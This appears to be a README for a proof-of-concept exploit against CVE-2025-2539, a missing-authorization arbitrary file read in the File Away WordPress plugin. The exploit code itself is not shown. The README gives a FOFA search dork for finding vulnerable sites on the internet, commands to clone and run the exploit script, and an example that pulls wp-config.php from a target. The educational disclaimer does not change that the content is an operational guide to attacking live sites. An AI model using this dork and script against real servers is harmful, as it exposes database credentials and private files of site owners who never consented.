POC - CVE-2025–2539 File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File

Overview

The File Away plugin for WordPress (versions ≤ 3.9.9.0.1) is affected by a critical vulnerability caused by a missing capability check in the ajax() function. This vulnerability allows unauthenticated users to exploit the plugin via crafted AJAX requests. Due to the use of a reversible weak encoding algorithm, attackers can read arbitrary files on the target server — including configuration files, credentials, or other sensitive data.

Impact: Complete disclosure of sensitive server-side files without authentication.

CVE ID: CVE-2025–2539 Vulnerable Plugin: File Away ≤ 3.9.9.0.1 Vulnerability Type: Missing Authorization / Arbitrary File Read Access Complexity: Low Authentication Required: None

Disclaimer: This Proof of Concept (POC) is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Getting Started

Finding Targets

To identify websites potentially using the vulnerable File Away plugin, use the following FOFA dork:

(body="/wp-content/plugins/file-away/" || (body="http://gmpg.org/xfn/11" && body="/wp-content/plugins/sparklethemes-shortcodes") && icon_hash="1198047028")

Cloning the Repository

First, clone the repository:

git clone https://github.com/verylazytech/CVE-2025-2539
cd CVE-2025-2539

Run the Exploit:

./CVE-2025-2539.sh <Target:port> <File>

Example:

./CVE-2025-2539.sh https://vulnerable-site.com /wp-config.php

The script will attempt to access and display the contents of the specified file if the target is vulnerable.

This makes it possible for unauthenticated attackers to read arbitrary files including the WordPress configuration file (wp-config.php).